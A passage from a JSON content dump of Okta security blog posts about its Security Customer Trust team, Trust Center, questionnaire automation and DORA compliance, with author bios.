questionnaires.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Trust plays a pivotal role in getting new prospects interested and retaining current customers. Earning and maintaining customer trust isn't just a goal; it's a commitment guiding every decision. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As part of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s Secure Identity Commitment\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", we've taken a proactive approach to this challenge by launching a new consolidated Trust Center. This centralized, seamless, and secure repository allows customers and partners to self-service access key compliance documents to validate our security posture and stay informed on our latest updates. Explore our new Trust Center and learn more about our transparency and security practices at\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"security.okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Customer Trust Team at Okta\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In Okta's ecosystem, the Security Customer Trust team is essential for maintaining platform security and continued integrity. This team proactively communicates Okta's security strategy, responds to customer inquiries, and builds trust through consistent outreach. By working closely with internal security teams, product, sales, privacy, and customer support, we ensure security is integrated across all aspects of Okta’s operations. This dedication to transparency, accountability, and customer-centricity helps Okta earn and maintain the trust of its global customer base.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Trust is more than just a buzzword; it’s a core principle woven into every facet of our organization. As a provider of identity management solutions, Okta understands that trust and identity are foundational to customer relationships. With the ever-growing complexity of identity attacks, protecting against these threats is critical. Okta remains committed to prioritizing features that safeguard users under the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Secure Identity Commitment\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", ensuring ongoing protection as technology evolves.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Security Customer Trust team operates with a clear mission: \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"to bolster security outcomes for Okta customers and the communities we serve\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\". The team is dedicated to advocating best practices and championing zero trust principles when leveraging Okta. Actively seeking feedback from customers and prospects, the team continually helps to enhance Okta's products and services, ensuring they remain at the forefront of security innovation.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Trust is the glue that binds Okta’s external relationships with customers, partners, vendors, and communities. Okta's vision, “\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"to free everyone to safely use any technology”,\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" underscores its commitment to providing a secure and reliable digital identity service. Rooted in the principle of \\\"love our customers,\\\" the team is dedicated to ensuring Okta’s services remain both available and secure.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The evolution of the CISO role highlights the growing importance of security in business strategy. Modern CISO’s are not only security practitioners, but also the strategic leaders responsible for integrating security across business operations, managing risks, and fostering a collective cybersecurity culture.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Implementing and Maintaining Trust\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Building customer trust is integral, especially given Identity Providers (IdP) like Okta face constant threats from well-funded adversaries. Cyber threats are persistent, highlighting the need for strong security measures. As Johan Thorbecke said, \\\"Trust arrives on foot and leaves on horseback.\\\" Trust can be fragile, so it's imperative to maintain through continuous and comprehensive security efforts to maintain confidence in cloud services.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security-First Approach\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta places security at the heart of everything, from product development to customer support. By sticking to strict security standards, Okta customers are reassured that their identities and data are safe. \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Security\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" articles help build trust and transparency with regular updates on security measures, product features, and potential vulnerabilities in alignment with our vision to\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" free everyone to safely use any technology.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Communication and Transparency\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Clear communication is pivotal to building trust. Okta has simplified accessing security information by uploading third-party attestations, industry-standard questionnaires, and current policies to our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://security.okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", reducing the need for formal security reviews and lengthy questionnaires.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The effectiveness of any Trust Center hinges on the quality of its content. In Okta’s, you’ll find: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Policies covering all aspects of security\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Information addressing common questions and standard questionnaires\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Roadmaps outlining upcoming security improvements\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Certifications, privacy policies, and whitepapers\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Centralizing these documents creates a secure hub for security information, ensuring only authorized individuals have access. \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"For more information on accessing Okta's Security Trust Center, visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/accessing-okta-s-security-trust-center?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Docs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Customer-Centricity and Continuous Improvement\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At Okta, customer-centricity and continuous improvement are priorities. Okta’s solutions are tailored to meet the evolving needs and preferences of our customers. We demonstrate our commitment to both trust and customer satisfaction by listening to customer feedback and addressing concerns. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We also understand that trust is earned through consistent performance and continuous enhancement, Okta invests in research and innovation to stay ahead of emerging threats. Continuous improvement is key, and every employee plays a part in maintaining customer trust by fostering a culture of security awareness.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Future of Customer Trust\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Advances in technology and cyber threats will continue to grow in sophistication, and as such organizations must remain dedicated to building trust, viewing new challenges as opportunities for growth and innovation. I’m confident that Okta will continue to set high standards in both trust-building and identity management, while staying committed to strong core values including integrity, security, and customer-centricity.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Trust plays a pivotal role in getting new prospects interested and retaining current customers. Earning and maintaining customer trust isn't just a goal; it's a commitment guiding every decision."},"updatedAt":"2025-06-19T21:01:41.796Z","secAuthor":[{"id":"0549c9bd-5615-52a0-8683-f6b734b931cc","bio":{"bio":"Tushar Badlani is the Global Customer Audit Manager within the Security Trust and Culture team at Okta. He leads Okta’s global customer audit program, ensuring consistent, risk-aligned assurance engagements across all regions. He brings extensive experience in customer assurance, compliance, and cross-functional collaboration, shaped by his consulting background at EY and work across industries and in professional services. Originally from India, he earned his master’s degree from Syracuse University and is now based in San Francisco. Outside of work, he enjoys hiking, backpacking, and travelling to explore new places and cultures; he’s now been to 27 countries and 45 US States.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/61duT68OiTwHjxJS8gPPuy/f02be27b559de0ada96a7902d219f067/Tushar_HeadShot.jpg"},"name":"Tushar Badlani","jobTitle":"Global Customer Audit Manager","slug":"/hacker/tushar-badlani","node_locale":"en"}]},{"slug":"/articles/2025/03/empowering-security-with-customer-trust-solutions","id":"6f25073a-2444-5626-86db-a35b1ed5ff96","title":"Empowering Security with Customer Trust Solutions","date":"2025-03-12T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This is the second blog publication in our series on Security Customer Trust. In our first blog, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2024/09/unveiling-essence-security-customer-trust\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Unveiling the Essence of the Security Customer Trust Function,\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" we explored how Okta’s Security Customer Trust team proactively maintains transparency and introduced our mission: \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"to bolster security outcomes for Okta and the communities we serve\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At Okta, trust is fundamental to how we provide support. In alignment with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/?_gl=1*1onpm9o*_gcl_aw*R0NMLjE3Mzc1ODA2MTAuQ2owS0NRaUF5OEs4QmhDWkFSSXNBS0o4c2ZUY0draGtGdkpOTWFpcFVrVFhCOG1jOUw5NGNjMHpKZXdOZjRXOUNUZzBxN1FFOUx5bnF3TWFBamtIRUFMd193Y0I.*_gcl_au*MTA4NzgyODQ1Ny4xNzM2ODIyNzEz*_ga*MTkzMzAxMTAxOS4xNzM2NzkzNzAy*_ga_QKMSDV5369*MTczOTMwNDc5Ny4xNS4xLjE3MzkzMDUyMDcuMy4wLjA.\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s Secure Identity Commitment\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (OSIC), we continuously invest in making security information more accessible and transparent for our customers. A key component of upholding trust is equipping both our internal teams and our customers with the necessary tools and resources to succeed.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given today’s numerous regulators, rigorous compliance certifications and internal policy adherence, we recognize that accessing key compliance documentation and obtaining timely responses to security inquiries is challenging and time-consuming. In this blog, we’ll touch on how we’ve introduced efficiencies in supporting these challenges through enablement, automation and self-service accesses. We continue to enable empowerment to enhance customer trust, drive efficiency, and reinforce customer confidence in the security of Okta’s products.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Common compliance challenges\\t\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While security certifications and frameworks establish a solid foundation, ensuring seamless access to security information for customers and prospects is a common cybersecurity challenge. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The absence of a Trust Center adds several complexities for requestors seeking to obtain the required documentation. From a lack of a centralized source of truth to the back-and-forth with common security questions, customers will recognize inefficiencies when working with auditors and regulators for their compliance-related activities. In addition, messaging inconsistencies are likely a result of manual efforts and the lack of RSS functionality. Timeliness is a significant challenge without a security customer trust solution - customers and prospects will often find themselves experiencing response delays.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Essential solutions for Security Customer Trust\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When strategizing, we prioritized scalability, seamless integration capabilities, and ease of use for both our solutions and technology. Enablement and automation solutions are fundamental to strengthening security and customer trust. By empowering our teams with ongoing training, a centralized knowledge base, and technology automation, we ensure they have the resources and confidence needed to navigate customer support requests effectively.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enablement\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A core component of our security toolkit is a comprehensive, centralized knowledge base. This internal knowledge base serves as the source of truth for security policies, compliance certifications, and security-related Q&A, which helps streamline questionnaire responses to customer or prospect inquiries.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A knowledge base ensures field teams have quick access to up-to-date information. It also provides a repository of common questions and answers to efficiently resolve repeat inquiries. By enabling self-service resources, we equip internal teams to succeed independently, reducing reliance on our security professionals for less complex inquiries.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Automation\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Playing a crucial role in improving operational efficiency regarding security and customer trust is automation. By automating key repeat processes, we minimize manual effort and accelerate response times to our customers. Automation introduced streamlined workflows, ensuring consistency in addressing common security challenges faced in the industry, like:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Providing timely responses to security questionnaires and compliance assessments,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Issuing important customer-centric messaging and communications,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Keeping field teams informed with the latest security updates.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At Okta, we utilize no-code workflow tools for automation use cases, which include ticket creation, streamlined audit processes, and standardizing engagement between field and security teams.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These automated workflows allow us to respond quickly and accurately, ensuring critical tasks are executed in real-time. For use cases such as penetration test and vulnerability information requests, we’ve implemented automated workflows for submission, tracking, and reporting. This ensures that security assessments are conducted efficiently and comprehensively, with timely customer responses. We’re committed to continually refining our policies and processes to enhance security assurance and privacy controls.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center benefits\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Last year, Okta introduced efficiencies by launching a new \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://security.okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", offering our customers and prospects real-time, on-demand access to Okta’s security and compliance documentation. Okta provides access to widely recognized industry-standard questionnaires via the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://security.okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", such as the following and more:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"CAIQ (Consensus Assessments Initiative Questionnaire),\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SIG (Standardized Information Gathering Questionnaire),\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SIG Privacy (Standardized Information Gathering – Privacy Questionnaire),\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"HECVAT (Higher Education Community Vendor Assessment Toolkit). \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The on-demand availability of industry-standard questionnaires helps streamline security assessments and effectively communicate an organization’s security controls, ensuring transparency and facilitating compliance discussions. In turn, organizations can streamline questionnaire responses, ensuring accurate and efficient turnaround times. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We invite you to explore our frictionless, transparent \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://security.okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to learn more about our transparency and security practices. \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"For more information on accessing Okta's Security Trust Center, visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/accessing-okta-s-security-trust-center?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Docs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Stay updated\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The essential solutions and technologies detailed in this blog article enable Okta to provide efficient, around-the-clock support to internal teams and external customers and prospects, focusing on security and customer trust.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta leverages the contact information of the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/okta-contact-definitions?language=en_US#:~:text=Definition%3A%20A%20Primary%20Security%20Contact,security%20and%2For%20privacy%20incident\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Contact\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for targeted messaging and automated approval for access to the efficient \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://security.okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". To ensure we have the most current security contacts for your organization, enabling you to stay informed on the latest critical security updates, we encourage our customers to reach out to their account teams to validate that the appropriate \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/super-admins-leverage-the-okta-help-center-to-review-and-update-your-companys-primary-security-contact-and-cio-ciso-contact?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Contacts\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" are on file. As we continue to enhance our offerings with security and customer trust at the forefront, stay tuned for more.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"This is the second blog publication in our series on Security Customer Trust. In our first blog, we explored how Okta’s Security Customer Trust team proactively maintains transparency and introduced our mission: to bolster security outcomes for Okta and the communities we serve. In this blog, we’ll touch on how we’ve introduced efficiencies in supporting these challenges through enablement, automation and self-service accesses."},"updatedAt":"2025-06-19T21:00:10.320Z","secAuthor":[{"id":"0549c9bd-5615-52a0-8683-f6b734b931cc","bio":{"bio":"Tushar Badlani is the Global Customer Audit Manager within the Security Trust and Culture team at Okta. He leads Okta’s global customer audit program, ensuring consistent, risk-aligned assurance engagements across all regions. He brings extensive experience in customer assurance, compliance, and cross-functional collaboration, shaped by his consulting background at EY and work across industries and in professional services. Originally from India, he earned his master’s degree from Syracuse University and is now based in San Francisco. Outside of work, he enjoys hiking, backpacking, and travelling to explore new places and cultures; he’s now been to 27 countries and 45 US States.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/61duT68OiTwHjxJS8gPPuy/f02be27b559de0ada96a7902d219f067/Tushar_HeadShot.jpg"},"name":"Tushar Badlani","jobTitle":"Global Customer Audit Manager","slug":"/hacker/tushar-badlani","node_locale":"en"},{"id":"fa04ab47-82af-5c37-83c0-2a2a861a79f8","bio":{"bio":"Lydia Le is an Associate Analyst at Okta, providing Assurance support to the Security Customer Trust team. Her commitment to continuous learning and keen attention to detail supports Okta’s mission by securing digital Identities and strengthening customer trust. Outside of work, Lydia enjoys reading, traveling, and exploring new cuisines - always eager to broaden her horizons and learn differing perspectives.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg"},"name":"Lydia Le","jobTitle":"Associate Analyst","slug":"/hackers/lydia-le","node_locale":"en"}]},{"slug":"/articles/2025/05/a-guide-to-dora-compliance-with-okta","id":"000752a2-da24-5457-9d42-94ca21d9a9e4","title":"A Guide to DORA Compliance with Okta","date":"2025-05-07T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This blog article provides a brief overview of the DORA regulation, outlines how Okta can support compliance adherence, and introduces our new Factsheet, a helpful resource for satisfying DORA's regulated requirements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is DORA?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.eiopa.europa.eu/digital-operational-resilience-act-dora_en\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Digital Operational Resilience Act\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (Regulation (EU) 2022/2554), most commonly known as DORA, became applicable in January 2025 and addresses a critical gap in EU financial regulation.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"With the introduction of DORA, financial institutions must follow stringent guidelines for safeguarding against ICT-related incidents. These include measures for protection, detection, containment, recovery, and repair. DORA explicitly targets ICT risks, introducing clear rules for ICT risk management, incident reporting, operational resilience testing, and oversight of ICT third-party risks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How does Okta support regulated customers?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is committed to supporting our regulated customers in adhering to DORA regulatory compliance. To guide our customers in adhering to DORA requirements with Okta, we’ve recently released a helpful resource: the new \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/?itemUid=72d0d5d6-8cc8-4333-91d4-743159aba9f4&source=click\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"DORA Compliance with Okta\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[{\"type\":\"underline\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Factsheet\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This factsheet provides valuable information that regulated customers can reference in their compliance efforts, including:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An Introduction to the Key DORA Domains\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This section provides an overview of the five key DORA domains and a high-level view of how Okta’s controls, processes, and supporting documentation can help regulated customers achieve domain requirements. Customers can reference this to review Okta’s compliance information in alignment with the DORA requirements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How can Okta help?\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This section highlights some of the many Okta features that are critical components of a highly available, resilient and secure identity platform. Customers can reference the information and links within this section to perform a thorough assessment of Okta’s security posture as it applies to their own DORA regulatory requirements. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detailed DORA Article mapping 